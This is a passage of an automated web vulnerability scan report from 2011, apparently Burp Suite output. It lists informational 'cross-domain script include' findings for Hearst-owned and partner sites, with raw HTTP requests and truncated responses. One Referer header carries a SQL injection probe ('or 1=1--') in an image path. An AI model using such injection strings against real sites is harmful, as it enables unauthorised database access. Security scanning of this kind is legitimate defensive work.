User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 461
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:35:03 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">


<script src="http://mpd.mxptint.net/1/S74.API/G1/T124/js?siz=300x250&mid=B25_27703F6F_10686B6&bp=3.76&sp=2.31&dm=c2VhdHRsZXBpLmNvbQ&cpd=2605"></script>
...[SNIP]...
19.38. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/hearst/300x250/ht_1064834_61686626

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316295043061&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 460
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:48:18 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">


<script src="http://mpd.mxptint.net/1/S74.API/G1/T124/js?siz=300x250&mid=B21_27705E8F_62F543&bp=3.76&sp=2.31&dm=c2VhdHRsZXBpLmNvbQ&cpd=2605"></script>
...[SNIP]...
19.39. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/hearst/300x250/ht_1064834_61686626

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316295736296&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 461
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:41:03 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">


<script src="http://mpd.mxptint.net/1/S74.API/G1/T124/js?siz=300x250&mid=B26_27704D7D_10F5909&bp=3.76&sp=2.31&dm=c2VhdHRsZXBpLmNvbQ&cpd=2605"></script>
...[SNIP]...
19.40. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686642  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/hearst/300x250/ht_1064834_61686642

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ad/iframe/610/hearst/300x250/ht_1064834_61686642?t=1316294694453&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fseattlepicom.php HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 461
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:23:43 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">


<script src="http://mpd.mxptint.net/1/S74.API/G1/T124/js?siz=300x250&mid=B139_277024EB_FDAAB8&bp=3.76&sp=2.31&dm=c2VhdHRsZXBpLmNvbQ&cpd=2605"></script>
...[SNIP]...
19.41. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61721100  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/hearst/300x250/ht_1064834_61721100

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ad/iframe/610/hearst/300x250/ht_1064834_61721100?t=1316295386536&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 461
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:35:15 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">


<script src="http://mpd.mxptint.net/1/S74.API/G1/T124/js?siz=300x250&mid=B26_27703FDE_10878AA&bp=3.76&sp=2.31&dm=c2VhdHRsZXBpLmNvbQ&cpd=2605"></script>
...[SNIP]...
19.42. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61721100  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/hearst/300x250/ht_1064834_61721100

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ad/iframe/610/hearst/300x250/ht_1064834_61721100?t=1316296146303&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 461
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:47:55 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">


<script src="http://mpd.mxptint.net/1/S74.API/G1/T124/js?siz=300x250&mid=B25_27705D97_1154B25&bp=3.76&sp=2.31&dm=c2VhdHRsZXBpLmNvbQ&cpd=2605"></script>
...[SNIP]...
19.43. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61721100  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/hearst/300x250/ht_1064834_61721100

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ad/iframe/610/hearst/300x250/ht_1064834_61721100?t=1316295386536&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 461
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:35:14 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">


<script src="http://mpd.mxptint.net/1/S74.API/G1/T124/js?siz=300x250&mid=B26_27703FD8_1087620&bp=3.76&sp=2.31&dm=c2VhdHRsZXBpLmNvbQ&cpd=2605"></script>
...[SNIP]...
19.44. http://widget.newsinc.com/_fw/common/toppicks_common1.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widget.newsinc.com
Path:   /_fw/common/toppicks_common1.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /_fw/common/toppicks_common1.html?wid=1709&cid=507&freewheel=90009&sitesection=stamford_hom&ZoneID=50912 HTTP/1.1
Host: widget.newsinc.com
Proxy-Connection: keep-alive
Referer: http://widget.newsinc.com/ndn_toppicks.html?wid=1709&cid=507&freewheel=90009&sitesection=stamford_hom
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1483107276-1315849734503; ANALYTICS_USER_TOKEN=802756E5-8724-4943-AEFB-8B9150565A781316021953542

Response

HTTP/1.1 200 OK
x-amz-id-2: F2SMoi1ojZkQww8amJ/BuJf1KiTQ6P4iSeirX6X9XUy80ib2HX5dvQ5rZ6DPT2aa
x-amz-request-id: FD7F4B5B0CF33019
Date: Sat, 17 Sep 2011 16:23:12 GMT
x-amz-meta-cb-modifiedtime: Fri, 09 Sep 2011 17:49:18 GMT
Last-Modified: Fri, 09 Sep 2011 19:53:34 GMT
ETag: "83b0c49b7548eff81af861456c4475c4"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 9269
Server: AmazonS3

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>NDN Top Picks Widge
...[SNIP]...
</script>

   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
19.45. http://www.answerology.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.answerology.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:27:18 GMT
Content-Length: 58941
Connection: close
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Relationship Advice - Get Answers to Relationship Questions</title>
<meta name="
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=I09839" CHARSET="ISO-8859-1"></script>
...[SNIP]...
</script>
<script src="http://js.revsci.net/gateway/gw.js?csid=F09828&auto=t"></script>
...[SNIP]...
19.46. http://www.answerology.com/N  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.answerology.com
Path:   /N

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.answerology.com

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:33:23 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=I09839" CHARSET="ISO-8859-1"></script>
...[SNIP]...
</script>
<script src="http://js.revsci.net/gateway/gw.js?csid=F09828&auto=t"></script>
...[SNIP]...
19.47. http://www.answerology.com/index.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.answerology.com
Path:   /index.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /index.aspx?template=about_our_ads.ascx HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/uploaded-images/80181898525213%20or%201%3d1--%20/40x37_thumb.jpg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=191590138.125975609.1316294747.1316294747.1316294747.1; __utmc=191590138; __utmz=191590138.1316294747.1.1.utmccn=(referral)|utmcsr=hearst.com|utmcct=/newspapers/metrix4media.php|utmcmd=referral; __utmv=191590138.null%3Alogged%20out; __utmb=191590138; rsi_segs=; s_cc=true; neworold=8; s_lastvisit=1316295024089; hm_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_nr=1316295025109; hm_neworold=New; s_pv=Answerology%3A%20error; s_ppv=0; s_sq=hmagglobal%2Chmaganswerology%3D%2526pid%253DAnswerology%25253A%252520error%2526pidt%253D1%2526oid%253Dhttp%25253A//www.answerology.com/index.aspx%25253Ftemplate%25253Dabout_our_ads.ascx%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:43:22 GMT
Content-Length: 11038
Connection: close
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>About Our Ads - Ask and answer questions anonymously on any topic.</title>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=I09839" CHARSET="ISO-8859-1"></script>
...[SNIP]...
</script>
<script src="http://js.revsci.net/gateway/gw.js?csid=F09828&auto=t"></script>
...[SNIP]...
19.48. http://www.answerology.com/uploaded-images/801818/40x37_thumb.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.answerology.com
Path:   /uploaded-images/801818/40x37_thumb.jpg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /uploaded-images/801818/40x37_thumb.jpg HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:47 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=I09839" CHARSET="ISO-8859-1"></script>
...[SNIP]...
</script>
<script src="http://js.revsci.net/gateway/gw.js?csid=F09828&auto=t"></script>
...[SNIP]...
19.49. http://www.answerology.com/uploaded-images/807708/40x37_thumb.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.answerology.com
Path:   /uploaded-images/807708/40x37_thumb.jpg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /uploaded-images/807708/40x37_thumb.jpg HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:46 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=I09839" CHARSET="ISO-8859-1"></script>
...[SNIP]...
</script>
<script src="http://js.revsci.net/gateway/gw.js?csid=F09828&auto=t"></script>
...[SNIP]...
19.50. http://www.delish.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.delish.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.delish.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: countrycode=us; neworold=8; sample=10; s_nr=1316282680825; __unam=753a475-13278828e41-121285cc-5; countrycode=us; __utma=120665501.1463594788.1316281819.1316285519.1316287865.3; __utmz=120665501.1316287865.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; s_lastvisit=1316287865298; rsi_segs=

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=193
Date: Sat, 17 Sep 2011 16:27:44 GMT
Content-Length: 87023
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:
...[SNIP]...
</script>


<script language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
<!-- SHARE THIS SCRIPT DONT REMOVE -->
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d63a4976-501a-446d-81e6-434d03d8388c&amp;type=website&amp;buttonText=&amp;embeds=true&amp;post_services=facebook%2Ctwitter%2Cdelicious%2Cstumbleupon%2Cmyspace%2Cdigg%2Creddit%2Cblogger%2Cwordpress%2Ctypepad%2Cgoogle_bmarks%2Cwindows_live%2Cfark%2Cbus_exchange%2Cpropeller%2Cnewsvine%2Clinkedin%2Ctechnorati%2Cmixx%2Cybuzz%2Cfriendfeed&amp;linkfg=%23668c1f&amp;offsetLeft=-180;onmouseover=false"></script>
...[SNIP]...
<!-- BEGIN MSN UX STYLE & SCRIPT INCLUDES -->
   <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/core.js"></script>
   <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/2/report.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script>
...[SNIP]...
</div>


<script language="javascript" type="text/javascript" src="http://analytics.live.com/Analytics/wlAnalytics.js"></script>
...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...
19.51. http://www.donatemydress.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.donatemydress.org
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.donatemydress.org
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 29267
Content-Type: text/html
Content-Location: http://www.donatemydress.org/index.html
Last-Modified: Wed, 13 Jul 2011 17:13:59 GMT
Accept-Ranges: bytes
ETag: "f36b68418041cc1:300"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 16:32:30 GMT


<html>
<head>
<title>Free Prom Dresses - Prom and Bridesmaid Dress Donations - DonateMyDress.org</title>
<META NAME="Description" CONTENT="DonateMyDress.org is a national network bringing toget
...[SNIP]...
<div style="padding: 10px;">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://subscribe.hearstmags.com/circulation/shared/scripts/s_code.js"></script>
...[SNIP]...
19.52. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/activity.php?site=www.ugo.com&width=300&height=300&header=false&colorscheme=dark&font=arial&border_color=black HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.6.31
X-Cnection: close
Date: Sat, 17 Sep 2011 16:30:15 GMT
Content-Length: 14238

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="TDBf";</scri
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/1iO7XjW7Qh8.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js"></script>
...[SNIP]...
19.53. http://www.facebook.com/plugins/fan.php  previous  next

Summary

Severity:   Information
